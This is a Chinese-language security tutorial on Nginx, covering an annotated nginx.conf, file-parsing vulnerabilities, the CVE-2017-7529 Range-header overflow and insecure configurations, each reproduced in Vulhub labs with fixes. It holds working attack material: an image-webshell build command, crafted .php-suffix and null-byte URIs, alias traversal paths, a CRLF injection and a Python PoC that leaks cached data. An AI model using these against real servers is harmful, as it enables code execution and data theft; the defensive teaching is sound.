0x00 前言

这里小结下Nginx这个常见Web中间件的安全攻防问题。

0x01 Nginx基础

Nginx简介

Nginx(engine x)是一个高性能的HTTP和反向代理Web服务器,同时也提供了IMAP/POP3/SMTP服务。Nginx源代码以类BSD许可证的形式发布,因它的稳定性、丰富的功能集、示例配置文件和低系统资源的消耗而闻名。

Nginx是一款轻量级的Web服务器/反向代理服务器及电子邮件(IMAP/POP3)代理服务器,在BSD-like协议下发行。其特点是占有内存少,并发能力强,事实上Nginx的并发能力在同类型的网页服务器中表现较好。

Nginx具有以下特点:

  • 处理静态文件,索引文件以及自动索引;打开文件描述符缓冲.
  • 无缓存的反向代理加速,简单的负载均衡和容错.
  • FastCGI,简单的负载均衡和容错.
  • 模块化的结构。包括 gzipping, byte ranges, chunked responses,以及 SSI-filter 等 filter。如果由 FastCGI 或其它代理服务器处理单页中存在的多个 SSI,则这项处理可以并行运行,而不需要相互等待。
  • 支持 SSL 和 TLSSNI.

Nginx组成架构

Nginx由内核和模块组成。

Nginx内核的设计非常微小和简洁,完成的工作也非常简单,仅仅通过查找配置文件将客户端请求映射到一个location block(location是Nginx配置中的一个指令,用于URL匹配),而在这个location中所配置的每个指令将会启动不同的模块去完成相应的工作。

Nginx的模块从结构上分为:

  • 核心模块:HTTP模块、 EVENT模块和MAIL模块;
  • 基础模块: HTTP Access模块、HTTP FastCGI模块、HTTP Proxy模块和HTTP Rewrite模块;
  • 第三方模块:HTTP Upstream Request Hash模块、 Notice模块和HTTP Access Key模块;

Nginx安装配置

参考:https://www.runoob.com/linux/nginx-install-setup.html

Nginx中HTTP请求流程

Nginx中一个HTTP请求的处理流程如图:

Nginx配置文件详解

如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
######Nginx配置文件nginx.conf中文详解#####

#定义Nginx运行的用户和用户组
user www www;

#nginx进程数,建议设置为等于CPU总核心数。
worker_processes 8;

#全局错误日志定义类型,[ debug | info | notice | warn | error | crit ]
error_log /usr/local/nginx/logs/error.log info;

#进程pid文件
pid /usr/local/nginx/logs/nginx.pid;

#指定进程可以打开的最大描述符:数目
#工作模式与连接数上限
#这个指令是指当一个nginx进程打开的最多文件描述符数目,理论值应该是最多打开文件数(ulimit -n)与nginx进程数相除,但是nginx分配请求并不是那么均匀,所以最好与ulimit -n 的值保持一致。
#现在在linux 2.6内核下开启文件打开数为65535,worker_rlimit_nofile就相应应该填写65535。
#这是因为nginx调度时分配请求到进程并不是那么的均衡,所以假如填写10240,总并发量达到3-4万时就有进程可能超过10240了,这时会返回502错误。
worker_rlimit_nofile 65535;


events
{
#参考事件模型,use [ kqueue | rtsig | epoll | /dev/poll | select | poll ]; epoll模型
#是Linux 2.6以上版本内核中的高性能网络I/O模型,linux建议epoll,如果跑在FreeBSD上面,就用kqueue模型。
#补充说明:
#与apache相类,nginx针对不同的操作系统,有不同的事件模型
#A)标准事件模型
#Select、poll属于标准事件模型,如果当前系统不存在更有效的方法,nginx会选择select或poll
#B)高效事件模型
#Kqueue:使用于FreeBSD 4.1+, OpenBSD 2.9+, NetBSD 2.0 和 MacOS X.使用双处理器的MacOS X系统使用kqueue可能会造成内核崩溃。
#Epoll:使用于Linux内核2.6版本及以后的系统。
#/dev/poll:使用于Solaris 7 11/99+,HP/UX 11.22+ (eventport),IRIX 6.5.15+ 和 Tru64 UNIX 5.1A+。
#Eventport:使用于Solaris 10。 为了防止出现内核崩溃的问题, 有必要安装安全补丁。
use epoll;

#单个进程最大连接数(最大连接数=连接数*进程数)
#根据硬件调整,和前面工作进程配合起来用,尽量大,但是别把cpu跑到100%就行。每个进程允许的最多连接数,理论上每台nginx服务器的最大连接数为。
worker_connections 65535;

#keepalive超时时间。
keepalive_timeout 60;

#客户端请求头部的缓冲区大小。这个可以根据你的系统分页大小来设置,一般一个请求头的大小不会超过1k,不过由于一般系统分页都要大于1k,所以这里设置为分页大小。
#分页大小可以用命令getconf PAGESIZE 取得。
#[root@web001 ~]# getconf PAGESIZE
#4096
#但也有client_header_buffer_size超过4k的情况,但是client_header_buffer_size该值必须设置为“系统分页大小”的整倍数。
client_header_buffer_size 4k;

#这个将为打开文件指定缓存,默认是没有启用的,max指定缓存数量,建议和打开文件数一致,inactive是指经过多长时间文件没被请求后删除缓存。
open_file_cache max=65535 inactive=60s;

#这个是指多长时间检查一次缓存的有效信息。
#语法:open_file_cache_valid time 默认值:open_file_cache_valid 60 使用字段:http, server, location 这个指令指定了何时需要检查open_file_cache中缓存项目的有效信息.
open_file_cache_valid 80s;

#open_file_cache指令中的inactive参数时间内文件的最少使用次数,如果超过这个数字,文件描述符一直是在缓存中打开的,如上例,如果有一个文件在inactive时间内一次没被使用,它将被移除。
#语法:open_file_cache_min_uses number 默认值:open_file_cache_min_uses 1 使用字段:http, server, location 这个指令指定了在open_file_cache指令无效的参数中一定的时间范围内可以使用的最小文件数,如果使用更大的值,文件描述符在cache中总是打开状态.
open_file_cache_min_uses 1;

#语法:open_file_cache_errors on | off 默认值:open_file_cache_errors off 使用字段:http, server, location 这个指令指定是否在搜索一个文件时记录cache错误.
open_file_cache_errors on;
}



#设定http服务器,利用它的反向代理功能提供负载均衡支持
http
{
#文件扩展名与文件类型映射表
include mime.types;

#默认文件类型
default_type application/octet-stream;

#默认编码
#charset utf-8;

#服务器名字的hash表大小
#保存服务器名字的hash表是由指令server_names_hash_max_size 和server_names_hash_bucket_size所控制的。参数hash bucket size总是等于hash表的大小,并且是一路处理器缓存大小的倍数。在减少了在内存中的存取次数后,使在处理器中加速查找hash表键值成为可能。如果hash bucket size等于一路处理器缓存的大小,那么在查找键的时候,最坏的情况下在内存中查找的次数为2。第一次是确定存储单元的地址,第二次是在存储单元中查找键 值。因此,如果Nginx给出需要增大hash max size 或 hash bucket size的提示,那么首要的是增大前一个参数的大小.
server_names_hash_bucket_size 128;

#客户端请求头部的缓冲区大小。这个可以根据你的系统分页大小来设置,一般一个请求的头部大小不会超过1k,不过由于一般系统分页都要大于1k,所以这里设置为分页大小。分页大小可以用命令getconf PAGESIZE取得。
client_header_buffer_size 32k;

#客户请求头缓冲大小。nginx默认会用client_header_buffer_size这个buffer来读取header值,如果header过大,它会使用large_client_header_buffers来读取。
large_client_header_buffers 4 64k;

#设定通过nginx上传文件的大小
client_max_body_size 8m;

#开启高效文件传输模式,sendfile指令指定nginx是否调用sendfile函数来输出文件,对于普通应用设为 on,如果用来进行下载等应用磁盘IO重负载应用,可设置为off,以平衡磁盘与网络I/O处理速度,降低系统的负载。注意:如果图片显示不正常把这个改成off。
#sendfile指令指定 nginx 是否调用sendfile 函数(zero copy 方式)来输出文件,对于普通应用,必须设为on。如果用来进行下载等应用磁盘IO重负载应用,可设置为off,以平衡磁盘与网络IO处理速度,降低系统uptime。
sendfile on;

#开启目录列表访问,合适下载服务器,默认关闭。
autoindex on;

#此选项允许或禁止使用socke的TCP_CORK的选项,此选项仅在使用sendfile的时候使用
tcp_nopush on;

tcp_nodelay on;

#长连接超时时间,单位是秒
keepalive_timeout 120;

#FastCGI相关参数是为了改善网站的性能:减少资源占用,提高访问速度。下面参数看字面意思都能理解。
fastcgi_connect_timeout 300;
fastcgi_send_timeout 300;
fastcgi_read_timeout 300;
fastcgi_buffer_size 64k;
fastcgi_buffers 4 64k;
fastcgi_busy_buffers_size 128k;
fastcgi_temp_file_write_size 128k;

#gzip模块设置
gzip on; #开启gzip压缩输出
gzip_min_length 1k; #最小压缩文件大小
gzip_buffers 4 16k; #压缩缓冲区
gzip_http_version 1.0; #压缩版本(默认1.1,前端如果是squid2.5请使用1.0)
gzip_comp_level 2; #压缩等级
gzip_types text/plain application/x-javascript text/css application/xml; #压缩类型,默认就已经包含textml,所以下面就不用再写了,写上去也不会有问题,但是会有一个warn。
gzip_vary on;

#开启限制IP连接数的时候需要使用
#limit_zone crawler $binary_remote_addr 10m;



#负载均衡配置
upstream jh.w3cschool.cn {

#upstream的负载均衡,weight是权重,可以根据机器配置定义权重。weigth参数表示权值,权值越高被分配到的几率越大。
server 192.168.80.121:80 weight=3;
server 192.168.80.122:80 weight=2;
server 192.168.80.123:80 weight=3;

#nginx的upstream目前支持4种方式的分配
#1、轮询(默认)
#每个请求按时间顺序逐一分配到不同的后端服务器,如果后端服务器down掉,能自动剔除。
#2、weight
#指定轮询几率,weight和访问比率成正比,用于后端服务器性能不均的情况。
#例如:
#upstream bakend {
# server 192.168.0.14 weight=10;
# server 192.168.0.15 weight=10;
#}
#2、ip_hash
#每个请求按访问ip的hash结果分配,这样每个访客固定访问一个后端服务器,可以解决session的问题。
#例如:
#upstream bakend {
# ip_hash;
# server 192.168.0.14:88;
# server 192.168.0.15:80;
#}
#3、fair(第三方)
#按后端服务器的响应时间来分配请求,响应时间短的优先分配。
#upstream backend {
# server server1;
# server server2;
# fair;
#}
#4、url_hash(第三方)
#按访问url的hash结果来分配请求,使每个url定向到同一个后端服务器,后端服务器为缓存时比较有效。
#例:在upstream中加入hash语句,server语句中不能写入weight等其他的参数,hash_method是使用的hash算法
#upstream backend {
# server squid1:3128;
# server squid2:3128;
# hash $request_uri;
# hash_method crc32;
#}

#tips:
#upstream bakend{#定义负载均衡设备的Ip及设备状态}{
# ip_hash;
# server 127.0.0.1:9090 down;
# server 127.0.0.1:8080 weight=2;
# server 127.0.0.1:6060;
# server 127.0.0.1:7070 backup;
#}
#在需要使用负载均衡的server中增加 proxy_pass http://bakend/;

#每个设备的状态设置为:
#1.down表示单前的server暂时不参与负载
#2.weight为weight越大,负载的权重就越大。
#3.max_fails:允许请求失败的次数默认为1.当超过最大次数时,返回proxy_next_upstream模块定义的错误
#4.fail_timeout:max_fails次失败后,暂停的时间。
#5.backup: 其它所有的非backup机器down或者忙的时候,请求backup机器。所以这台机器压力会最轻。

#nginx支持同时设置多组的负载均衡,用来给不用的server来使用。
#client_body_in_file_only设置为On 可以讲client post过来的数据记录到文件中用来做debug
#client_body_temp_path设置记录文件的目录 可以设置最多3层目录
#location对URL进行匹配.可以进行重定向或者进行新的代理 负载均衡
}



#虚拟主机的配置
server
{
#监听端口
listen 80;

#域名可以有多个,用空格隔开
server_name www.w3cschool.cn w3cschool.cn;
index index.html index.htm index.php;
root /data/www/w3cschool;

#对******进行负载均衡
location ~ .*.(php|php5)?$
{
fastcgi_pass 127.0.0.1:9000;
fastcgi_index index.php;
include fastcgi.conf;
}

#图片缓存时间设置
location ~ .*.(gif|jpg|jpeg|png|bmp|swf)$
{
expires 10d;
}

#JS和CSS缓存时间设置
location ~ .*.(js|css)?$
{
expires 1h;
}

#日志格式设定
#$remote_addr与$http_x_forwarded_for用以记录客户端的ip地址;
#$remote_user:用来记录客户端用户名称;
#$time_local: 用来记录访问时间与时区;
#$request: 用来记录请求的url与http协议;
#$status: 用来记录请求状态;成功是200,
#$body_bytes_sent :记录发送给客户端文件主体内容大小;
#$http_referer:用来记录从那个页面链接访问过来的;
#$http_user_agent:记录客户浏览器的相关信息;
#通常web服务器放在反向代理的后面,这样就不能获取到客户的IP地址了,通过$remote_add拿到的IP地址是反向代理服务器的iP地址。反向代理服务器在转发请求的http头信息中,可以增加x_forwarded_for信息,用以记录原有客户端的IP地址和原来客户端的请求的服务器地址。
log_format access '$remote_addr - $remote_user [$time_local] "$request" '
'$status $body_bytes_sent "$http_referer" '
'"$http_user_agent" $http_x_forwarded_for';

#定义本虚拟主机的访问日志
access_log /usr/local/nginx/logs/host.access.log main;
access_log /usr/local/nginx/logs/host.access.404.log log404;

#对 "/" 启用反向代理
location / {
proxy_pass http://127.0.0.1:88;
proxy_redirect off;
proxy_set_header X-Real-IP $remote_addr;

#后端的Web服务器可以通过X-Forwarded-For获取用户真实IP
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;

#以下是一些反向代理的配置,可选。
proxy_set_header Host $host;

#允许客户端请求的最大单文件字节数
client_max_body_size 10m;

#缓冲区代理缓冲用户端请求的最大字节数,
#如果把它设置为比较大的数值,例如256k,那么,无论使用firefox还是IE浏览器,来提交任意小于256k的图片,都很正常。如果注释该指令,使用默认的client_body_buffer_size设置,也就是操作系统页面大小的两倍,8k或者16k,问题就出现了。
#无论使用firefox4.0还是IE8.0,提交一个比较大,200k左右的图片,都返回500 Internal Server Error错误
client_body_buffer_size 128k;

#表示使nginx阻止HTTP应答代码为400或者更高的应答。
proxy_intercept_errors on;

#后端服务器连接的超时时间_发起握手等候响应超时时间
#nginx跟后端服务器连接超时时间(代理连接超时)
proxy_connect_timeout 90;

#后端服务器数据回传时间(代理发送超时)
#后端服务器数据回传时间_就是在规定时间之内后端服务器必须传完所有的数据
proxy_send_timeout 90;

#连接成功后,后端服务器响应时间(代理接收超时)
#连接成功后_等候后端服务器响应时间_其实已经进入后端的排队之中等候处理(也可以说是后端服务器处理请求的时间)
proxy_read_timeout 90;

#设置代理服务器(nginx)保存用户头信息的缓冲区大小
#设置从被代理服务器读取的第一部分应答的缓冲区大小,通常情况下这部分应答中包含一个小的应答头,默认情况下这个值的大小为指令proxy_buffers中指定的一个缓冲区的大小,不过可以将其设置为更小
proxy_buffer_size 4k;

#proxy_buffers缓冲区,网页平均在32k以下的设置
#设置用于读取应答(来自被代理服务器)的缓冲区数目和大小,默认情况也为分页大小,根据操作系统的不同可能是4k或者8k
proxy_buffers 4 32k;

#高负荷下缓冲大小(proxy_buffers*2)
proxy_busy_buffers_size 64k;

#设置在写入proxy_temp_path时数据的大小,预防一个工作进程在传递文件时阻塞太长
#设定缓存文件夹大小,大于这个值,将从upstream服务器传
proxy_temp_file_write_size 64k;
}


#设定查看Nginx状态的地址
location /NginxStatus {
stub_status on;
access_log on;
auth_basic "NginxStatus";
auth_basic_user_file confpasswd;
#htpasswd文件的内容可以用apache提供的htpasswd工具来产生。
}

#本地动静分离反向代理配置
#所有jsp的页面均交由tomcat或resin处理
location ~ .(jsp|jspx|do)?$ {
proxy_set_header Host $host;
proxy_set_header X-Real-IP $remote_addr;
proxy_set_header X-Forwarded-For $proxy_add_x_forwarded_for;
proxy_pass http://127.0.0.1:8080;
}

#所有静态文件由nginx直接读取不经过tomcat或resin
location ~ .*.(htm|html|gif|jpg|jpeg|png|bmp|swf|ioc|rar|zip|txt|flv|mid|doc|ppt|
pdf|xls|mp3|wma)$
{
expires 15d;
}

location ~ .*.(js|css)?$
{
expires 1h;
}
}
}
######Nginx配置文件nginx.conf中文详解#####

0x02 Nginx解析漏洞

Nginx解析漏洞主要分为以下两种。

未知文件解析漏洞

漏洞原理

该漏洞与Nginx版本、PHP版本无关,属于用户配置不当造成的解析漏洞。

两个核心配置:

  • cgi.fix_pathinfo:php.ini的配置项,当该配置项值为1时,用于修复路径,如果当前路径不存在则采用上层路径,比如传入/test.png/1.php路径、由于1.php不存在则会在传给FastCGI处理的路径就变为test.png。该配置项默认为1;
  • security.limit_extensions:php-fpm.conf配置项,此配置项限制了FastCGI解析文件的类型(即指定什么类型的文件当做PHP代码解析),但此项设置为空时是允许FastCGI将任意类型的文件当做PHP代码来解析的;

环境搭建

直接用的Vulhub:https://vulhub.org/#/environments/nginx/nginx_parsing_vulnerability/

漏洞复现

先使用copy命令制作一个图片马:

1
copy /b noface.jpg + shell.php/a = muma.jpg

上传图片马,能正常访问:

URL栏追加/xx.php后缀即可触发解析漏洞,成功解析图片马:

漏洞分析

漏洞根源就是配置存在问题,直接看配置文件的设置。

先看到php.ini,这里环境没有php.ini文件,直接看php.ini-development或php.ini-production,其中并没有配置cgi.fix_pathino配置项,但是其默认值就是1,即启用修复路径,在前面输入路径/uploadfiles/91f1d6b9e6e11024e0ae83cbce848c7f.jpg/1.php时,由于1.php不存在因此实际传入给FastCGI的是/uploadfiles/91f1d6b9e6e11024e0ae83cbce848c7f.jpg路径来进行解析:

接着看php-fpm.conf,文件内容中没有security.limit_extensions配置项,但是include=etc/php-fpm.d/*.conf引入了该目录中的所有.conf文件,在其中的www-2.conf文件中找到了该配置项,且该配置项为空,即没有进行任何限制、可以以PHP代码来解析由上层Nginx传下来的/uploadfiles/91f1d6b9e6e11024e0ae83cbce848c7f.jpg路径文件,从而触发解析漏洞:

修复方法

针对配置项修复即可:

  • 修改php.ini文件中cgi.fix_pathino配置项的值为0;
  • 添加php-fpm.conf文件中security.limit_extensions配置项的值为php,即限定FastCGI只对PHP相关后缀文件进行PHP代码解析;

文件名逻辑漏洞(CVE-2013-4547)

影响版本

Nginx 0.8.41 ~ 1.4.3 / 1.5.0 ~ 1.5.7

漏洞原理

由于Nginx存在文件名逻辑漏洞、会错误地解析请求的URI,导致获取到了错误的文件名,从而可能造成权限绕过、代码执行等安全漏洞。

环境搭建

直接用的Vulhub:https://vulhub.org/#/environments/nginx/CVE-2013-4547/

漏洞复现

最大的危害当然就是解析漏洞了,能解析PHP代码从而执行任意命令。

直接上传WebShell文件,修改文件名后缀为”.jpg “,即在文件后缀名后面追加个空格:

访问http://your-ip:8080/uploadfiles/shell.jpg[0x20][0x00].php来触发漏洞,这里直接在Hex栏修改:

当然,除了解析漏洞外,文件名逻辑漏洞还能造成访问限制绕过等的安全风向。

这里修改下nginx.conf配置,/admin/目录限定只能本地访问:

然后在Web目录中新建admin子目录,其中新建index.php文件,内容随意。

接着,在Linux中,Web目录中新建”mi1k7ea “子目录,注意目录名最后必须为空格。这是因为在Linux中,如果有一个不存在的目录,则即使跳转到上一层,也会爆文件不存在的错误,Windows下则没有这个限制。

因为不是本地请求,外部用户是没法访问到/admin/目录中的内容的:

但是结合文件名逻辑漏洞,就可以绕过Nginx路由限制来越权访问(注意空格不要编码):

漏洞分析

漏洞根源就是配置存在问题,直接看配置文件的设置。这里以解析漏洞的实例分析。

先看到nginx.conf,当Nginx匹配到.php结尾的请求,就发送给FastCGI进行解析:

这个配置很正常,但是在漏洞版本的Nginx中,如果收到shell.jpg[0x20][0x00].php的请求时,这个URI可以匹配上如上图的正则\.php$的Location块,其中Nginx会识别到请求的文件是shell.jpg[0x20],就设置其为SCRIPT_FILENAME的值发送给FastCGI进行解析,而PHP-FPM中并未设置security.limit_extensions配置项的值,从而可以以PHP代码来解析shell.jpg[0x20]文件,触发解析漏洞:

修复方法

  • 升级Nginx版本;
  • 添加php-fpm.conf文件中security.limit_extensions配置项的值为php,即限定FastCGI只对PHP相关后缀文件进行PHP代码解析;

%00截断解析漏洞

这部分Nginx版本过低,已经很少见了,漏洞原理也很简单,就不搞靶场了。

影响版本

Nginx 0.5.*, 0.6.*, 0.7 <= 0.7.65, 0.8 <= 0.8.37

漏洞原理

对于低版本的Nginx,可以在任意文件名后面添加%00.php进行解析攻击。

如:1.jpg%00.php就会将前面1.jpg文件当成PHP文件进行解析执行。

修复方法

升级Nginx版本;

0x03 Nginx整数溢出漏洞(CVE-2017-7529)

影响版本

Nginx 0.5.6 ~ 1.13.2

漏洞原理

Nginx在反向代理站点的时候,通常会将一些文件进行缓存,特别是静态文件。缓存的部分存储在文件中,每个缓存文件包括“文件头”+“HTTP返回包头”+“HTTP返回包体”。如果二次请求命中了该缓存文件,则Nginx会直接将该文件中的“HTTP返回包体”返回给用户。

如果我的请求中包含Range头,Nginx将会根据我指定的start和end位置,返回指定长度的内容。而如果我构造了两个负的位置,如(-600, -9223372036854774591),将可能读取到负位置的数据。如果这次请求又命中了缓存文件,则可能就可以读取到缓存文件中位于“HTTP返回包体”前的“文件头”、“HTTP返回包头”等内容。

环境搭建

直接用的Vulhub:https://vulhub.org/#/environments/nginx/CVE-2017-7529/

当然也可以自己用Docker搭建,参考旧博客:使用Docker搭建Nginx整数溢出漏洞(CVE-2017-7529)及Python PoC验证

漏洞复现

正常访问Web页面,是Nginx默认页面,该页面实际上是反向代理的8081端口的内容:

这里直接看P神Vulhub中的PoC,就是:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
#!/usr/bin/env python
import sys
import requests

if len(sys.argv) < 2:
print("%s url" % (sys.argv[0]))
print("eg: python %s http://your-ip:8080/" % (sys.argv[0]))
sys.exit()

headers = {
'User-Agent': "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.10240"
}
offset = 605
url = sys.argv[1]
file_len = len(requests.get(url, headers=headers).content)
n = file_len + offset
headers['Range'] = "bytes=-%d,-%d" % (
n, 0x8000000000000000 - n)

r = requests.get(url, headers=headers)
print(r.text)

运行python poc.py http://your-ip:8080/后,可以看到是越界读取到了Cache文件头及其内容(Nginx和被代理的服务器之间的响应报文头和Body内容等):

漏洞分析

先看到Nginx配置文件nginx.conf,其中包含了如下conf文件:

看到,其中关键Nginx设置如下:

  • proxy_cache_path:设置缓存文件的路径和参数;
  • proxy_cache_valid:设定缓存有效期;
  • proxy_pass:反向代理配置,参数为代理的目标服务地址;
  • proxy_cache:指定使用的keys_zone名称,这里就是上面的cache_zone;
  • add_header:在Nginx返回的HTTP头中增加一项X-Proxy-Cache,如果缓存命中其值为HIT,未命中则为MISS;
  • proxy_ignore_headers:Nginx不会缓存带有Set-Cookie的返回,因此这里设置忽略该HTTP头;

由此可知,正常访问之后,就会缓存目标页面内容到proxy_cache_path指定的目录中,查看确实存在Cache文件,前面部分是Cache文件头部信息包括Key,后面就是响应报文的内容:

可以看到,这和前面通过PoC脚本触发整数溢出漏洞来获取到的Cache文件内容是一致的。

OK,来看下根源的代码问题,从补丁修复代码看起,主要在ngx_http_range_filter_module.c的ngx_http_range_parse()函数上做了两次修改:

据此可知,本次整数溢出漏洞的漏洞点正是出在Nginx处理HTTP请求头Range的数值时并没有进行整数溢出漏洞过滤而导致的。其中bytes-range读取的起始范围可能为负数,从而读取缓存文件头部。

更多的漏洞分析请参考:CVE-2017-7529 Nginx整数溢出漏洞分析

修复方法

升级Nginx版本;

0x04 Nginx不安全配置

当Nginx配置不当时,也会导致一些安全问题。

下面的环境均搭建自Vulhub:https://vulhub.org/#/environments/nginx/insecure-configuration/

CRLF注入漏洞

漏洞原理

Nginx的内置遍历$uri是指当前的请求URI,不包括任何参数(见$args)。其中,Nginx会对$uri进行解码操作。如果攻击者在URI中注入%0a%0d就会造成CRLF注入漏洞。

Demo

不安全配置示例如下,即直接将$uri拼接到302重定向的地址上,会造成CRLF注入漏洞:

直接在URI栏注入即可,比如注入Set-Cookie头:

可以往响应报文Body注入XSS payload,但是这里由于Location头的值协议不可控、302这处无法直接在浏览器触发RXSS:

防御方法

审计Nginx配置文件中$uri的使用位置,禁止直接用在URL跳转地址的拼接上。

目录穿越漏洞

漏洞原理

Nginx服务器通过设置Alias别名的方式,可以使不在网站根目录下的目录也能被Web访问。

Nginx的配置autoindex作用是自动创建索引,换句话说就是目录浏览功能,当为on时页面可以显示当前目录下所有文件/目录内容,当为off时页面为403 Forbidden。

如果在配置别名(Alias)的时候,忘记在location的目录最后追加/,会导致存在目录穿越漏洞。

Demo

看个不安全的配置示例:

正常访问,由于autoindex为on,页面就显示了home目录中的所有文件和目录:

访问/files../的时候就会目录穿越:

当然,并非autoindex开启了才能利用,只是说页面会展示出当前目录下所有的文件和目录信息而已,方便查看,即使不开启autoindex也能直接目录穿越获取目标文件、只是访问目录的时候为403而已。

比如去掉autoindex on这个配置后,访问/file../etc/目录时是403,但是访问具体文件就能直接下载了:

注意,此处场景目录穿越只能往上穿一层,示例中刚好上一层就是根目录因此可以看到所有文件和目录,但是实际场景可能目录穿越的利用很有限。

防御方法

在Nginx配置文件中location的目录最后必须要追加/

add_header被覆盖

漏洞原理

add_header是headers模块中定义的一个指令,用来添加HTTP响应头部。

Nginx是分层级组织的,每层可以有自己的指令,子块继承父块的配置;但对于相同指令,子块的配置可以覆盖掉父块的配置。子块中如果设置了add_header,那么就会覆盖掉父块中的add_header,这样就可能会造成一些安全风险。

Demo

不安全的配置示例,原本在Web整站即父块中添加了CSP头和X-Frame-Options头设置的,其在子块/test1目录是直接使用生效的,但是在另一个子块/test2目录中会重新add_header导致前面整站的add_header设置被覆盖:

正常访问/test1目录,响应头确实设置了CSP头和X-Frame-Options头,其中页面是引用了一个JS文件:

这个JS文件就是往页面id为m的标签内写入当前URL中#号后面的内容,即存在DOM XSS风险:

这里注意个细节,如果直接引用这个JS脚本,无论后面有没有CSP都无法成功触发XSS,这是因为默认这个输出是对关键字符如尖括号进行了URL编码的,此时需要我们稍微改下app.js的代码,添加个URL解码操作即对获取到URI栏的内容调用decodeURI()函数才能成功:

1
2
3
4
window.onload = function() {
var m = document.getElementById('m');
m.innerHTML = decodeURI(location.hash.substr(1));
}

由于CSP设置为default-src 'self'即只允许同源下的资源,这里/static/app.js是同源资源因此可以加载进来执行,但不允许内联资源(要允许内联资源需要设置’unsafe-inline’,其允许如内联的script元素、javascript: URL、内联的事件处理函数和内联的style元素等)。也就是说,即使注入XSS payload,如下的内联的on事件也是不会执行的:

当我们访问/test2目录时,看到响应报文并没有前面整站设置的CSP头和X-Frame-Options头,而是该子块直接设置的X-Content-Type-Options头,也就是说父块的add_header被子块的add_header覆盖了:

结合前面的存在DOM XSS风险,这里由于没有CSP限制所以能成功触发利用:

注意,这里XSS payload不能用<script>标签、会无法触发执行,这是因为这个DOM操作是用的innerHTML来进行的,需要用如<img>等标签来注入才能成功。

防御方法

非必须不要设置在子块再次配置add_header来覆盖父块的add_header配置;如果业务需要必须设置,则需要严格审计是否会出现相关的安全风险。

0x05 参考

Nginx 入门指南